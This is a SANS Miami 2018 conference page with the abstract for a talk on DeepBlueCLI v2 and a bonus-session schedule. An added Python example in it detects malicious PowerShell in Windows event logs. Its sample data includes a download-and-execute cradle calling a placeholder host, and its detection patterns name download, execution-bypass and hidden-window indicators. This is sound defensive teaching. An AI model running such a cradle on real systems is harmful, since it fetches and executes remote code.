Miami 2018

Miami, FL | Mon, Jan 29, 2018 - Sat, Feb 3, 2018

Introducing DeepBlueCLI v2, now ported to Python and ELK

  • Eric Conrad
  • Tuesday, January 30th, 7:15pm - 8:15pm

Recent malware attacks leverage PowerShell for post exploitation. Why? No EXE for antivirus or HIPS to squash, nothing saved to the filesystem, sites that use application whitelisting allow PowerShell, and little to no default logging.

Event logs continue to be the best source to centrally hunt malice in a Windows environment. Virtually all malware may be detected (including the latest PowerShell-fueled post exploitation) via event logs, after making small tweaks to the logging configuration. DeepBlueCLI will go toe-to-toe with the latest attacks: this talk will explore the evidence malware leaves behind, leveraging Windows command line auditing (now natively available in Windows 7+) and PowerShell logging.
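The two log sources the abstract names, process creation auditing with the command line included (Security Event ID 4688) and PowerShell script block logging (Microsoft-Windows-PowerShell/Operational Event ID 4104), are exactly what a DeepBlueCLI-style tool consumes. The following Python is an added illustration, not DeepBlueCLI's own code: the sample events are constructed, and the rule names, regexes and the length threshold are this example's assumptions. It shows the core idea of the approach, decoding `-EncodedCommand` payloads and matching a small set of indicators across both event types, so a reader can see what evidence those two logging tweaks make visible.

```python
"""Minimal DeepBlueCLI-style triage of Windows event records (added example).

Consumes records shaped like what a SIEM extracts from Security 4688
(process creation with command line) and PowerShell/Operational 4104
(script block text). Rules and thresholds are assumptions for illustration.
"""
import base64
import re

# Constructed sample events, not real log data.
SAMPLE_EVENTS = [
    {"EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Exec Bypass -Enc "
                    + base64.b64encode("Write-Host 'hello'".encode("utf-16le")).decode()},
    {"EventID": 4104,
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://EXAMPLE-PLACEHOLDER/stage.ps1')"},
    {"EventID": 4104,
     "ScriptBlockText": r"Get-ChildItem C:\temp | Measure-Object"},
]

# -e / -en / -enc / -EncodedCommand followed by a base64 blob (assumed rule).
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")

# Indicator rules applied to raw text and to any decoded payload (assumed rules).
SUSPICIOUS_TOKENS = {
    "download cradle": re.compile(r"(?i)(?:DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest)"),
    "invoke-expression": re.compile(r"(?i)(?:\bIEX\b|Invoke-Expression)"),
    "execution policy bypass": re.compile(r"(?i)-exec(?:utionpolicy)?\s+bypass"),
    "hidden window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
}
LONG_COMMAND_LINE = 1000  # assumed threshold; obfuscated one-liners are often far longer


def decode_encoded_command(blob):
    """PowerShell -EncodedCommand is base64 over UTF-16LE; return text or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _match_tokens(text, source, note=None):
    return [{"source": source, "rule": name, "decoded": note}
            for name, rx in SUSPICIOUS_TOKENS.items() if rx.search(text)]


def analyse_event(event):
    """Return a list of findings for one 4688 or 4104 record (empty if benign)."""
    eid = event.get("EventID")
    if eid == 4688:
        text, source = event.get("CommandLine", ""), "4688 command line"
    elif eid == 4104:
        text, source = event.get("ScriptBlockText", ""), "4104 script block"
    else:
        return []  # other event IDs are out of scope for this example

    findings = []
    m = ENCODED_RE.search(text)
    if m:
        decoded = decode_encoded_command(m.group(1))
        findings.append({"source": source, "rule": "encoded command", "decoded": decoded})
        if decoded:
            # Indicators hidden inside the payload matter as much as the outer command line.
            findings.extend(_match_tokens(decoded, source + " (decoded payload)", decoded))
    findings.extend(_match_tokens(text, source))
    if len(text) > LONG_COMMAND_LINE:
        findings.append({"source": source, "rule": "long command line", "decoded": None})
    return findings


def triage(events):
    """Run analyse_event over a sequence of records and flatten the findings."""
    return [f for e in events for f in analyse_event(e)]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['source']:32} {f['rule']:24} {f['decoded'] or ''}")
```

The decode step is the part worth keeping: an encoded command line looks like noise to a keyword search, but once it is turned back into UTF-16LE text the same indicator rules apply to it. Feeding real 4688 and 4104 exports in requires only mapping your SIEM's field names onto `CommandLine` and `ScriptBlockText`.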


Bonus Sessions

The following bonus sessions are open to all paid attendees at no additional cost. There are many different types of events that fall into these categories:

  • SANS@Night: Evening presentations given after day courses have ended. This category includes Keynotes.
  • Special Events: SANS-hosted events and other non-technical recreational offerings. This category includes, but is not limited to, Receptions and Information Tables.

Monday, January 29
Session | Speaker | Time | Type
General Session - Welcome to SANS | Eric Conrad | Monday, January 29th, 8:00am - 8:30am | Special Events
Welcome Threat Hunters, Phishermen, and Other Liars | Rob Lee | Monday, January 29th, 7:15pm - 9:15pm | Keynote

Tuesday, January 30
Session | Speaker | Time | Type
Introducing DeepBlueCLI v2, now ported to Python and ELK | Eric Conrad | Tuesday, January 30th, 7:15pm - 8:15pm | SANS@Night
Adversary Simulations - Taking Attack Models and Penetration Testing to the Next Level | Jorge Orchilles | Tuesday, January 30th, 8:15pm - 9:15pm | SANS@Night

Wednesday, January 31
Session | Speaker | Time | Type
Real World Incidents and Threats to Critical Infrastructure | Mark Bristow | Wednesday, January 31st, 7:15pm - 8:15pm | SANS@Night
Finance Fundamentals: Building the Business Case for Security | Robert Kirtley | Wednesday, January 31st, 8:15pm - 9:15pm | SANS@Night

Thursday, February 1
Session | Speaker | Time | Type
Infosec Rock Star: Geek Will Only Get You So Far | Ted Demopoulos | Thursday, February 1st, 7:15pm - 8:15pm | SANS@Night